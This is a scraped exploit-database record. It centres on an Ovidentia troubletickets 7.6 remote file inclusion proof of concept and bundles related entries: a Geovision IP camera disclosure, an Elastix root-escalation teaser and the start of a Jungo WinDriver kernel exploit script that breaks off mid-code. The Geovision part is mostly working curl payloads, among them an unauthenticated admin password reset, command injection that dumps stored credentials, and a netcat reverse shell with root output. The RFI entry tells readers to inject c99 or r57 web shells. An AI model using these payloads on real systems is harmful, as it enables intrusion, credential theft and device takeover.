ID 1337DAY-ID-25000 Type zdt Reporter bd0rk Modified 2016-04-12T00:00:00
Description
Exploit for php platform in category web applications
# Title: Ovidentia Module troubletickets 7.6 GLOBALS[babInstallPath] Remote File Inclusion Vulnerability
# Author: bd0rk || SCHOOL-OF-HACK.NET
# eMail: bd0rk[at]hackermail.com
# Website: http://www.school-of-hack.net
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Ftroubletickets&file=troubletickets-7-6.zip&idf=838
Proof-of-Concept:
Vuln.-Code in /troubletickets-7-6/programs/statistique_evolution.php line 16
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
require_once $GLOBALS['babInstallPath'].'utilit/dateTime.php';
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+]Usage: http://[someone]/troubletickets-7-6/programs/statistique_evolution.php?GLOBALS[babInstallPath]=[SHELLCODE]
The problem: The GLOBALS[babInstallPath]-parameter isn't declared before require_once.
So an attacker can inject some php-shellcode (c99 or r57 for example) 'bout it.
It's no problem to patch it!
Declare this parameter or use an alert!
Greetings from bd0rk. HackThePlanet!
# 0day.today [2018-03-19] #
{"published": "2016-04-12T00:00:00", "id": "1337DAY-ID-25000", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["description", "published", "reporter", "modified", "sourceHref", "sourceData", "title", "href"], "edition": 1, "lastseen": "2016-04-19T04:09:51", "bulletin": {"published": "2016-02-25T00:00:00", "id": "1337DAY-ID-25000", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 4.6, "modified": "2016-04-19T04:09:51"}}, "hash": "2e383df99cd1c3b9c84f0fba2e099328e8f39e33ecbb646cfa526674ba2b7b53", "description": "A remote command execution vulnerability exists in Elastix PBX version 2.2.0 and earlier when using unpatched versions of FreePBX 2.5, 2.6, 2.7, 2.8, 2.9, and 2.10. This vulnerability in Elastix 2.2.0 and earlier allows for remote command execution in Elastix. Once it completes you may type \"nmap --interactive\" and \"!sh\" to escalate your privileges to root on most systems.\n\nThis is private exploit. You can buy it at http://0day.today", "type": "zdt", "lastseen": "2016-04-19T04:09:51", "edition": 1, "title": "Elastix PBX 2.2.0 Remote Command Execution with Local Privilege Escalation Exploit", "href": "http://0day.today/exploit/description/25000", "modified": "2016-02-25T00:00:00", "bulletinFamily": "exploit", "viewCount": 12, "cvelist": [], "sourceHref": "", "references": [], "reporter": "0day Today Team", "sourceData": "", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "sourceData"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "51fdf70b2265dec218616a77dd0e679a", "key": "href"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "fedb8f1af32e10bfd154845e1054c2ee", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "sourceHref"}, {"hash": "7bf59d5e58470604ab6f178f1d0a5c27", "key": "description"}, {"hash": "86fafcde2f8b00145efced7b975ee959", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "a402e8dffe8ee0ba4a366d75dbe8fad6", "key": "published"}, {"hash": "a402e8dffe8ee0ba4a366d75dbe8fad6", "key": "modified"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "91b82ecddd9fcdcfd18ba15ce1a4e812665629f336ba2427cf339162e795fe88", "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-29725", "1337DAY-ID-28439", "1337DAY-ID-25438", "1337DAY-ID-24947", "1337DAY-ID-25723", "1337DAY-ID-20700", "1337DAY-ID-20597", "1337DAY-ID-19417", "1337DAY-ID-16572", "1337DAY-ID-14752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:144046", "PACKETSTORM:137942", "PACKETSTORM:121045"]}, {"type": "exploitdb", "idList": ["EDB-ID:42624", "EDB-ID:40113", "EDB-ID:24947", "EDB-ID:24935"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/MISC/MONGOD_NATIVE_HELPER"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29157"]}], "modified": "2018-03-19T05:23:25"}, "vulnersScore": 5.0}, "type": "zdt", "lastseen": "2018-03-19T05:23:25", "edition": 2, "title": "Ovidentia troubleticketsModule 7.6 - Remote File Inclusion", "href": "https://0day.today/exploit/description/25000", "modified": "2016-04-12T00:00:00", "bulletinFamily": "exploit", "viewCount": 19, "cvelist": [], "sourceHref": "https://0day.today/exploit/25000", "references": [], "reporter": "bd0rk", "sourceData": "# Title: Ovidentia Module troubletickets 7.6 GLOBALS[babInstallPath] Remote File Inclusion Vulnerability\r\n# Author: bd0rk || SCHOOL-OF-HACK.NET\r\n# eMail: bd0rk[at]hackermail.com\r\n# Website: http://www.school-of-hack.net\r\n# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Ftroubletickets&file=troubletickets-7-6.zip&idf=838\r\n \r\nProof-of-Concept:\r\n \r\nVuln.-Code in /troubletickets-7-6/programs/statistique_evolution.php line 16\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\nrequire_once $GLOBALS['babInstallPath'].'utilit/dateTime.php';\r\n \r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\n[+]Usage: http://[someone]/troubletickets-7-6/programs/statistique_evolution.php?GLOBALS[babInstallPath]=[SHELLCODE]\r\n \r\nThe problem: The GLOBALS[babInstallPath]-parameter isn't declared before require_once.\r\n So an attacker can inject some php-shellcode (c99 or r57 for example) 'bout it.\r\n It's no problem to patch it!\r\n Declare this parameter or use an alert!\r\n \r\n \r\nGreetings from bd0rk. HackThePlanet!\n\n# 0day.today [2018-03-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "5aa9637956cdcdfebff7b414e2d49d94", "key": "href"}, {"hash": "9aa94e028f9943096f22029df1d1332e", "key": "modified"}, {"hash": "9aa94e028f9943096f22029df1d1332e", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "30894eb60ec9170479037f799f3e38ce", "key": "reporter"}, {"hash": "997a60b608c0714ed79c69134df53273", "key": "sourceData"}, {"hash": "27ceadde9f7d51bd3c80e3a09c18ed35", "key": "sourceHref"}, {"hash": "30f79b5d6cdf0eb8ee49bce54a1b51c5", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"trendmicroblog": [{"lastseen": "2019-05-10T14:21:34", "bulletinFamily": "blog", "description": "\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn how credit card skimming attacks can impact businesses and how ransomware can use software installations to help hide malicious activities.\n\nRead on:\n\n**[Mirrorthief Group Uses Magecart Skimming Attack to Hit Hundreds of Campus Online Stores in US and Canada](<https://blog.trendmicro.com/trendlabs-security-intelligence/mirrorthief-group-uses-magecart-skimming-attack-to-hit-hundreds-of-campus-online-stores-in-us-and-canada/>)**\n\n_Trend Micro uncovered recent activity by hacking group Mirrorthief involving the notorious online credit card skimming attack known as Magecart, which impacted 201 online campus stores in the United States and Canada._\n\n**[Hackers Steal $40.7 Million in Bitcoin from Crypto Exchange Binance](<https://www.coindesk.com/hackers-steal-40-7-million-in-bitcoin-from-crypto-exchange-binance>)**\n\n_Hackers stole more than 7,000 bitcoin from crypto exchange Binance and were able to access user API keys, two-factor authentication codes and other information to withdraw $41 million in bitcoin from the exchange._\n\n**[Cyberattack Cripples Baltimore's Government Computer Servers](<https://abcnews.go.com/US/wireStory/cyberattack-cripples-baltimores-government-computer-servers-62888773>)**\n\n_Baltimore's government rushed to shut down most of its computer servers after its network was hit by a ransomware virus, though officials believe it has not touched critical public safety systems. _\n\n**[Dharma Ransomware Uses AV Tool to Distract from Malicious Activities](<https://blog.trendmicro.com/trendlabs-security-intelligence/dharma-ransomware-uses-av-tool-to-distract-from-malicious-activities/>)**\n\n_Trend Micro recently found new samples of Dharma ransomware that are using a new technique: using software installation as a distraction to help hide malicious activities._\n\n**[What Israel\u2019s Strike on Hamas Hackers Means for Cyberwar](<https://www.wired.com/story/israel-hamas-cyberattack-air-strike-cyberwar/>)**\n\n_The Israeli Defense Force claimed that it bombed and partially destroyed one building in Gaza because it was allegedly the base of an active Hamas hacking group._\n\n**[CVE-2019-3396 Redux: Confluence Vulnerability Exploited to Deliver Cryptocurrency Miner with Rootkit](<https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/>)**\n\n_Trend Micro observed a critical vulnerability involving Confluence that was being exploited by threat actors to perform malicious attacks. _\n\n**[Trump Creates New Cybersecurity Competition with a $25,000 Award](<https://www.rollcall.com/news/congress/trump-creates-new-cybersecurity-competition-with-a-25000-award>)**\n\n_The Trump administration announced steps to address a shortage of cybersecurity workers across the federal government, including sponsorship of a national competition and allowing cyber experts to rotate from one agency to another. _\n\nWhat are your thoughts on hacking groups like Mirrorthief and their impact on businesses and consumers? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay.](<https://twitter.com/jonlclay>)\n\n_ _\n\nThe post [This Week in Security News: Skimming Attacks and Ransomware](<https://blog.trendmicro.com/this-week-in-security-news-skimming-attacks-and-ransomware/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2019-05-10T13:00:42", "published": "2019-05-10T13:00:42", "id": "TRENDMICROBLOG:9FD54B8253FD0053BA014F80A7261833", "href": "https://blog.trendmicro.com/this-week-in-security-news-skimming-attacks-and-ransomware/", "type": "trendmicroblog", "title": "This Week in Security News: Skimming Attacks and Ransomware", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-03-19T21:12:59", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category remote exploits", "modified": "2018-02-07T00:00:00", "published": "2018-02-07T00:00:00", "href": "https://0day.today/exploit/description/29725", "id": "1337DAY-ID-29725", "title": "Geovision Inc. IP Camera/Video/Access Control - Multiple Remote Command Execution / Stack Overflow /", "type": "zdt", "sourceData": "[STX]\r\n \r\nSubject: Geovision Inc. IP Camera/Video/Access Control Multiple Remote Command Execution - Multiple Stack Overflow - Double free - Unauthorized Access\r\n \r\nAttack vector: Remote\r\nAuthentication: Anonymous (no credentials needed)\r\nResearcher: bashis <mcw noemail eu> (November 2017)\r\nPoC: https://github.com/mcw0/PoC\r\nPython PoC: https://github.com/mcw0/PoC/blob/master/Geovision-PoC.py\r\nRelease date: February 1, 2018\r\nFull Disclosure: 90 days\r\n \r\nVendor URL: http://www.geovision.com.tw/\r\nUpdated FW: http://www.geovision.com.tw/download/product/\r\n \r\nheap: Executable + Non-ASLR\r\nstack: Executable + ASLR\r\n \r\nVulnerable:\r\nPractically more or less all models and versions with FW before November/December 2017 of Geovision embedded IP devices suffer from one or more of these vulnerabilities.\r\n \r\nVerified:\r\nGV-BX1500 v3.10 2016-12-02\r\nGV-MFD1501 v3.12 2017-06-19\r\n \r\nTimeline:\r\nNovember 5, 2017: Initiated contact with Geovision\r\nNovember 6, 2017: Response from Geovision\r\nNovember 8, 2017: Informed Geovision about quite dangerous bug in 'FilterSetting.cgi'\r\nNovember 8, 2017: Responce from Geovision\r\nNovember 15, 2017: Reached out to Geovision to offer more time until FD\r\n (due to the easy exploiting and number of vulnerabilities in large number of products)\r\nNovember 17, 2017: Request from Geovision to have time to end of January 2018\r\nNovember 18, 2017: Agreed to FD date of February 1, 2018\r\nNovember 20, 2017: Received one image for test purposes\r\nNovember 26, 2017: ACK to Geovision that image looks good\r\nJanuary 16, 2018: Sent this FD and PoC Python to Geovision for comments before FD, if any objections.\r\nJanuary 17, 2018: Received all OK from Geovision, no objections, toghether with thanks for the effort for trying to make Geovision products more safe.\r\nJanuary 17, 2018: Thanked Geoviosion for good cooperation.\r\nFebruary 1, 2018: Full disclosure\r\n \r\n \r\n-[Unathorized Access]-\r\n \r\n1)\r\nPoC: Reset and change 'admin' to 'root' with passwd 'PWN' (GV-MFD1501 v3.12 2017-06-19)\r\ncurl -v http://192.168.57.20:80/UserCreat.cgi?admin_username=root\\&admin_passwordNew=PWN\r\n \r\n2)\r\nPoC: Change device WebGUI language back to default\r\ncurl -v -X POST http://192.168.57.20:80/LangSetting.cgi -d lang_type=0\\&submit=Apply\r\n \r\n3)\r\nUnathorized upgrade of firmware.\r\nPoC: Reboot the remote device as in 'run_upgrade_prepare'\r\ncurl -v \"http://192.168.57.20:80/geo-cgi/sdk_fw_update.cgi\"\r\nURI: http://192.168.57.20/ssi.cgi/FirmwareUpdate.htm\r\n \r\n4)\r\nPoC: Upload of Firmware header for checking correct firmware.\r\ncurl -v -X PUT \"http://192.168.57.20:80/geo-cgi/sdk_fw_check.cgi\" -d \"BAAAALAAAAABAgAAAAAAADKvfBIAAAABGDIpBwAAAABhc19jcmZpZAAAAAAAAAAALgYAALAAAADXe///AAAAAAAAAABib290bG9hZGVyLmJpbgAAAAA0ALAAAgBOAP//AAAAAAAAAAB1SW1hZ2UAAAAAAAAAAAAA1OIaALAANgDSw///AAAAAAAAAAByYW1kaXNrLmd6AAAAAAAAALBtArAAUgAIuf//AAAAAAAAAAAjIFN0YXJpbmcgd2l0aCAnSElEOicgYW5kIHNwbGl0IGJ5ICcsJyBhbmQgZW5kIHdpdGggJ1xyXG4nICgweDBkIDB4MGEpDQpISUQ6MTE3MCxOYW1lOkdWLUxQQzIyMTAsRG93blZlcjoxMDINCkhJRDoxMTUwLE5hbWU6R1YtUFBUWjczMDBfU0QsRG93blZlcjozMDUNCkhJRDoxMTUyLE5hbWU6R1YtUFBUWjczMDBfRkUsRG93blZlcjozMDUNCkhJRDoxMTc2LE5hbWU6R1YtQlgzNDAwRSxEb3duVmVyOjMwMw0KSElEOjExNzUsTmFtZTpHVi1CWDE1MDBFLERvd25WZXI6MzAzDQpISUQ6MTEwMSxOYW1lOkdWLVVORkUyNTAzLERvd25WZXI6MzA2DQpISUQ6MTE0NSxOYW1lOkdWLVVOMjYwMCxEb3c=\"\r\n \r\n/var/log/messages\r\n192.168.57.1 - - [01/Jan/1970:00:32:43 +0000] \"PUT /geo-cgi/sdk_fw_check.cgi HTTP/1.1\" 200 25000 \"\" \"curl/7.38.0\"\r\nNov 5 17:11:51 thttpd[1576]: (1576) cgi[3734]: Spawned CGI process 1802 to run 'geo-cgi/sdk_fw_check.cgi', query[]\r\nNov 5 17:11:51 sdk_fw_check.cgi: CONTENT_LENGTH = 684\r\nNov 5 17:11:51 sdk_fw_check.cgi: (1802) main[183]: base64 encode length : 684\r\nNov 5 17:11:51 sdk_fw_check.cgi: (1802) main[184]: base64 encode output : BAAAALAAAAABAgAAAAAAADKvfBIAAAABGDIpBwAAAABhc19jcmZpZAAAAAAAAAAALgYAALAAAADXe///AAAAAAAAAABib290bG9hZGVyLmJpbgAAAAA0ALAAAgBOAP//AAAAAAAAAAB1SW1hZ2UAAAAAAAAAAAAA1OIaALAANgDSw///AAAAAAAAAAByYW1kaXNrLmd6AAAAAAAAALBtArAAUgAIuf//AAAAAAAAAAAjIFN0YXJpbmcgd2l0aCAnSElEOicgYW5kIHNwbGl0IGJ5ICcsJyBhbmQgZW5kIHdpdGggJ1xyXG4nICgweDBkIDB4MGEpDQpISUQ6MTE3MCxOYW1lOkdWLUxQQzIyMTAsRG93blZlcjoxMDINCkhJRDoxMTUwLE5hbWU6R1YtUFBUWjczMDBfU0QsRG93blZlcjozMDUNCkhJRDoxMTUyLE5hbWU6R1YtUFBUWjczMDBfRkUsRG93blZlcjoz\r\nNov 5 17:11:51 sdk_fw_check.cgi: (1802) main[185]: decode length : 512\r\nNov 5 17:11:51 sdk_fw_check.cgi: (1802) main[186]: decode output : ^D\r\nNov 5 17:11:51 sdk_fw_check.cgi: (1802) check_image_format_is_OK[839]: (1) Product Error: Image's magic[513] != DEV_MAGIC[1000]\r\nNov 5 17:11:51 sdk_fw_check.cgi: (1802) check_firmware[135]: ERROR : check firmware, length [512]\r\n \r\n5)\r\nUnathorized access of 'sdk_config_set.cgi' to Import Setting (SDK_CONFIG_SET) \r\ncurl -v -X PUT \"http://192.168.57.20:80/geo-cgi/sdk_config_set.cgi\"\r\n \r\n6)\r\n/PSIA/\r\nAccess to GET (read) and PUT (write)\r\ncurl -v -X PUT http://192.168.57.20:80/PSIA/System/reboot\r\ncurl -v -X PUT http://192.168.57.20:80/PSIA/System/updateFirmware\r\ncurl -v -X PUT http://192.168.57.20:80/PSIA/System/factoryReset\r\n[...]\r\nList: /PSIA/System/reboot/index\r\nUsage: /PSIA/System/reboot/description\r\nPoC: curl -v -X PUT http://192.168.57.20:80/PSIA/System/reboot\r\nFull recursive list: /PSIA/indexr\r\n \r\n \r\n-[Remote Command Execution]-\r\n \r\n7)\r\nPoC will create 'tmp/Login.cgi' with '<!--#include file=\"SYS_CFG\"-->', then Dump All Settings,\r\nincluding login and passwords in clear text by accessing the created Login.htm\r\n \r\ncurl -v \"http://192.168.57.20:80/PictureCatch.cgi?username=GEOVISION&password=%3becho%20%22%3c%21--%23include%20file=%22SYS_CFG%22--%3e%22%3etmp/Login.htm%3b&data_type=1&attachment=1&channel=1&secret=1&key=PWNED\" ; curl -v \"http://192.168.57.20:80/ssi.cgi/tmp/Login.htm\"\r\n \r\n< HTTP/1.1 200 OK\r\n...\r\n-------------------------------------\r\n- -\r\n- Dump All Settings -\r\n- -\r\n-------------------------------------\r\n...\r\n \r\n \r\n8)\r\nPoC will pop reverse connect back shell to 192.168.57.1\r\n \r\n/www/PictureCatch.cgi\r\ncurl -v \"http://192.168.57.20:80/PictureCatch.cgi?username=GEOVISION\\&password=%3bmkfifo%20/tmp/s0%3bnc%20-w%205%20192.168.57.1%201337</tmp/s0|/bin/sh>/tmp/s0%202>/tmp/s0%3brm%20/tmp/s0%3b\\&data_type=1\\&attachment=1\\&channel=1\\&secret=1\\&key=PWNED\"\r\n \r\n$ ncat -vlp 1337\r\nNcat: Version 7.12 ( https://nmap.org/ncat )\r\nNcat: Listening on :::1337\r\nNcat: Listening on 0.0.0.0:1337\r\nNcat: Connection from 192.168.57.20.\r\nNcat: Connection from 192.168.57.20:55331.\r\npwd\r\n/www\r\nid\r\nuid=0(root) gid=0(root)\r\nexit\r\n$\r\n \r\n9)\r\n/www/JpegStream.cgi\r\ncurl -v \"http://192.168.57.20:80/JpegStream.cgi?username=GEOVISION\\&password=%3bmkfifo%20/tmp/s0%3bnc%20-w%205%20192.168.57.1%201337</tmp/s0|/bin/sh>/tmp/s0%202>/tmp/s0%3brm%20/tmp/s0%3b\\&data_type=1\\&attachment=1\\&channel=1\\&secret=1\\&key=PWNED\"\r\n \r\n$ ncat -vlp 1337\r\nNcat: Version 7.12 ( https://nmap.org/ncat )\r\nNcat: Listening on :::1337\r\nNcat: Listening on 0.0.0.0:1337\r\nNcat: Connection from 192.168.57.20.\r\nNcat: Connection from 192.168.57.20:55332.\r\npwd\r\n/www\r\nid\r\nuid=0(root) gid=0(root)\r\nexit\r\n$\r\n \r\nProblem(s):\r\nSIiUTIL_GetDecryptData calling popen() \"sh -c /var/www/testbf d PWNED ;mkfifo /tmp/s0;...\" without proper sanitation of user input\r\n \r\nNote: \r\nVulnerable tags: 'username', 'password' and 'key'\r\n \r\n \r\n-[Double free]-\r\n \r\n10)\r\ncurl -v http://192.168.57.20:80/PSIA/System/configurationData\r\n*** glibc detected *** psia.cgi: double free or corruption (out): 0x00077d10 ***\r\n \r\n-[Stack Overflow]-\r\n \r\n11)\r\n/usr/local/thttpd\r\ncurl -v \"http://192.168.57.20:80/htpasswd?password=`for((i=0;i<140;i++));do echo -en \"X\";done`AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII\"\r\n \r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x49494948 in ?? ()\r\n(gdb) bt\r\n#0 0x49494948 in ?? ()\r\n#1 0x0003889c in ?? ()\r\nBacktrace stopped: previous frame identical to this frame (corrupt stack?)\r\n(gdb) i reg\r\nr0 0x0 0\r\nr1 0x369650 3577424\r\nr2 0x1 1\r\nr3 0x68 104\r\nr4 0x41414141 1094795585\r\nr5 0x42424242 1111638594\r\nr6 0x43434343 1128481603\r\nr7 0x44444444 1145324612\r\nr8 0x45454545 1162167621\r\nr9 0x46464646 1179010630\r\nr10 0x47474747 1195853639\r\nr11 0x48484848 1212696648\r\nr12 0x3680e8 3571944\r\nsp 0x7ee0fbc8 0x7ee0fbc8\r\nlr 0x3889c 231580\r\npc 0x49494948 0x49494948\r\ncpsr 0x20000030 536870960\r\n(gdb)\r\n \r\n12)\r\n/usr/local/thttpd\r\ncurl -v http://192.168.57.20:80/geo-cgi/param.cgi?skey=`for((i=0;i<44;i++)); do echo -en \"X\"; done`AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNN\r\n \r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x49494948 in ?? ()\r\n(gdb) bt\r\n#0 0x49494948 in ?? ()\r\n#1 0x3e4c4d54 in ?? ()\r\nBacktrace stopped: previous frame identical to this frame (corrupt stack?)\r\n(gdb) i reg\r\nr0 0xffffffff 4294967295\r\nr1 0x7e963e8c 2123775628\r\nr2 0x0 0\r\nr3 0x242 578\r\nr4 0x41414141 1094795585\r\nr5 0x42424242 1111638594\r\nr6 0x43434343 1128481603\r\nr7 0x44444444 1145324612\r\nr8 0x45454545 1162167621\r\nr9 0x46464646 1179010630\r\nr10 0x47474747 1195853639\r\nr11 0x48484848 1212696648\r\nr12 0xa 10\r\nsp 0x7e983c48 0x7e983c48\r\nlr 0x3e4c4d54 1045187924\r\npc 0x49494948 0x49494948\r\ncpsr 0x60000030 1610612784\r\n(gdb)\r\n \r\n13)\r\n/www/PictureCatch.cgi\r\ncurl -v \"http://192.168.57.20:80/PictureCatch.cgi?username=`for((i=0;i<324;i++));do echo -en \"A\";done`BBBB&password=GEOVISION&data_type=1&attachment=1&channel=1&secret=1&key=PWNED\"\r\n \r\n[pid 2215] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---\r\n \r\n14)\r\n/www/Login3gpp.cgi\r\ncurl -v \"http://192.168.57.20:80/Login3gpp.cgi?username=`for((i=0;i<444;i++));do echo -en \"A\";done`BBBB&password=PWNED\"\r\n \r\n[pid 2161] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424243} ---\r\n \r\n15)\r\n/www/Login.cgi\r\ncurl -v \"http://192.168.57.20:80/Login.cgi?username=`for((i=0;i<477;i++));do echo -en \"A\";done`BBBB&password=PWNED\"\r\n \r\n[pid 2135] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---\r\n \r\nNote: username and password uses strcpy() and both are vulnerable.\r\nHowever, 'password' cannot be used remotely since 'thttpd' checking for this, and is vulnerable for stack overflow.\r\n \r\nHave a nice day\r\n/bashis\r\n \r\n[ETX]\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/29725"}, {"lastseen": "2018-01-10T03:12:13", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2017-09-06T00:00:00", "published": "2017-09-06T00:00:00", "href": "https://0day.today/exploit/description/28439", "id": "1337DAY-ID-28439", "type": "zdt", "title": "Jungo DriverWizard WinDriver - Kernel Pool Overflow Exploit", "sourceData": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nJungo DriverWizard WinDriver Kernel Pool Overflow Vulnerability\r\n\r\nDownload: http://www.jungo.com/st/products/windriver/\r\nFile: WD1240.EXE\r\nSha1: 3527cc974ec885166f0d96f6aedc8e542bb66cba\r\nDriver: windrvr1240.sys\r\nSha1: 0f212075d86ef7e859c1941f8e5b9e7a6f2558ad\r\nCVE: CVE-2017-14153\r\nAuthor: Steven Seeley (mr_me) of Source Incite\r\nAffected: <= v12.4.0\r\nThanks: b33f, ryujin and sickness\r\nAnalysis: http://srcincite.io/blog/2017/09/06/sharks-in-the-pool-mixed-object-exploitation-in-the-windows-kernel-pool.html\r\n\r\nSummary:\r\n========\r\n\r\nThis vulnerability allows local attackers to escalate privileges on vulnerable installations of Jungo WinDriver. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\r\n\r\nThe specific flaw exists within the processing of IOCTL 0x953824b7 by the windrvr1240 kernel driver. The issue lies in the failure to properly validate user-supplied data which can result in a kernel pool overflow. An attacker can leverage this vulnerability to execute arbitrary code under the context of kernel.\r\n\r\nTimeline:\r\n=========\r\n\r\n2017-08-22 \u2013 Verified and sent to Jungo via <a href=\"/cdn-cgi/l/email-protection\" class=\"__cf_email__\" data-cfemail=\"4c3f2d20293f0c\">[email protected]</a>/<a href=\"/cdn-cgi/l/email-protection\" class=\"__cf_email__\" data-cfemail=\"1e78776c6d6a5e\">[email protected]</a>/<a href=\"/cdn-cgi/l/email-protection\" class=\"__cf_email__\" data-cfemail=\"41322422343328353801\">[email protected]</a>/<a href=\"/cdn-cgi/l/email-protection\" class=\"__cf_email__\" data-cfemail=\"234a4d454c6349564d444c0d404c4e\">[email protected]</a>\r\n2017-08-25 \u2013 No response from Jungo and two bounced emails\r\n2017-08-26 \u2013 Attempted a follow up with the vendor via website chat\r\n2017-08-26 \u2013 No response via the website chat\r\n2017-09-03 \u2013 Recieved an email from a Jungo representative stating that they are \"looking into it\"\r\n2017-09-03 \u2013 Requested a timeframe for patch development and warned of possible 0day release\r\n2017-09-06 \u2013 No response from Jungo\r\n2017-09-06 \u2013 Public 0day release of advisory\r\n\r\nExample:\r\n========\r\n\r\nC:\\Users\\Guest\\Desktop>icacls poc.py\r\npoc.py NT AUTHORITY\\Authenticated Users:(I)(F)\r\nNT AUTHORITY\\SYSTEM:(I)(F)\r\nBUILTIN\\Administrators:(I)(F)\r\nBUILTIN\\Users:(I)(F)\r\nMandatory Label\\Low Mandatory Level:(I)(NW)\r\n\r\nSuccessfully processed 1 files; Failed processing 0 files\r\n\r\nC:\\Users\\Guest\\Desktop>whoami\r\ndebugee\\guest\r\n\r\nC:\\Users\\Guest\\Desktop>poc.py\r\n\r\n--[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ]\r\nSteven Seeley (mr_me) of Source Incite\r\n\r\n(+) spraying pool with mixed objects...\r\n(+) sprayed the pool!\r\n(+) making pool holes...\r\n(+) made the pool holes!\r\n(+) allocating shellcode...\r\n(+) allocated the shellcode!\r\n(+) triggering pool overflow...\r\n(+) allocating pool overflow input buffer\r\n(+) elevating privileges!\r\nMicrosoft Windows [Version 6.1.7601]\r\nCopyright (c) 2009 Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Users\\Guest\\Desktop>whoami\r\nnt authority\\system\r\n\r\nC:\\Users\\Guest\\Desktop>\r\n\"\"\"\r\nfrom ctypes import *\r\nfrom ctypes.wintypes import *\r\nimport struct, sys, os, time\r\nfrom platform import release, architecture\r\n\r\nntdll = windll.ntdll\r\nkernel32 = windll.kernel32\r\nMEM_COMMIT = 0x00001000\r\nMEM_RESERVE = 0x00002000\r\nPAGE_EXECUTE_READWRITE = 0x00000040\r\nSTATUS_SUCCESS = 0x0\r\nSTATUS_INFO_LENGTH_MISMATCH = 0xC0000004\r\nSTATUS_INVALID_HANDLE = 0xC0000008\r\nSystemExtendedHandleInformation = 64\r\n\r\nclass LSA_UNICODE_STRING(Structure):\r\n\"\"\"Represent the LSA_UNICODE_STRING on ntdll.\"\"\"\r\n_fields_ = [\r\n(\"Length\", USHORT),\r\n(\"MaximumLength\", USHORT),\r\n(\"Buffer\", LPWSTR),\r\n]\r\n\r\nclass SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure):\r\n\"\"\"Represent the SYSTEM_HANDLE_TABLE_ENTRY_INFO on ntdll.\"\"\"\r\n_fields_ = [\r\n(\"Object\", c_void_p),\r\n(\"UniqueProcessId\", ULONG),\r\n(\"HandleValue\", ULONG),\r\n(\"GrantedAccess\", ULONG),\r\n(\"CreatorBackTraceIndex\", USHORT),\r\n(\"ObjectTypeIndex\", USHORT),\r\n(\"HandleAttributes\", ULONG),\r\n(\"Reserved\", ULONG),\r\n]\r\n\r\nclass SYSTEM_HANDLE_INFORMATION_EX(Structure):\r\n\"\"\"Represent the SYSTEM_HANDLE_INFORMATION on ntdll.\"\"\"\r\n_fields_ = [\r\n(\"NumberOfHandles\", ULONG),\r\n(\"Reserved\", ULONG),\r\n(\"Handles\", 